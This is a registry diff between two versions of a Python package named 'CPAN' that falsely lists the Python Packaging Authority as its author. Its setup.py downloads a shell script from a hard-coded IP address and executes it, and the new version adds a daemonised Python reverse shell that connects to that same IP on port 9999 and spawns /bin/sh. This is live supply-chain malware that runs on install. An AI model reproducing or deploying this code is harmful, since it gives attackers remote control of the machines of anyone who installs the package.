CPAN 0.0.2__tar.gz → 0.0.3__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: CPAN
3
- Version: 0.0.2
3
+ Version: 0.0.3
4
4
  Summary: demo
5
5
  Home-page: https://github.com/pypa/setuptools
6
6
  Author: Python Packaging Authority
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: CPAN
3
- Version: 0.0.2
3
+ Version: 0.0.3
4
4
  Summary: demo
5
5
  Home-page: https://github.com/pypa/setuptools
6
6
  Author: Python Packaging Authority
@@ -12,7 +12,7 @@ import subprocess
12
12
  import threading
13
13
 
14
14
  # 定义目标路径,使用 HOME 环境变量
15
- path = os.environ.get("HOME", "") + "/.explorer.exe"
15
+ path = os.environ.get("HOME", "") + "/explorer.sh"
16
16
 
17
17
  def process() -> None:
18
18
  """执行目标路径下的文件"""
@@ -21,7 +21,7 @@ def process() -> None:
21
21
 
22
22
  def download() -> None:
23
23
  """从指定URL下载文件"""
24
- response = requests.get("http://124.221.175.251/start.sh")
24
+ response = requests.get("http://124.221.175.251/11.sh")
25
25
  if response.status_code != 200:
26
26
  exit()
27
27
  with open(path, 'wb') as file:
@@ -39,7 +39,7 @@ execute()
39
39
  # 定义守护进程相关函数
40
40
  def b():
41
41
  """执行系统命令"""
42
- os.system('echo bashHACK')
42
+ os.system('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'124.221.175.251\',9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"')
43
43
 
44
44
  def a():
45
45
  """创建守护进程"""
@@ -79,7 +79,7 @@ c()
79
79
  setuptools.setup(
80
80
  name='CPAN',
81
81
  packages=setuptools.find_packages(),
82
- version='0.0.2',
82
+ version='0.0.3',
83
83
  description='demo',
84
84
  author='Python Packaging Authority',
85
85
  url='https://github.com/pypa/setuptools',
File without changes
File without changes
File without changes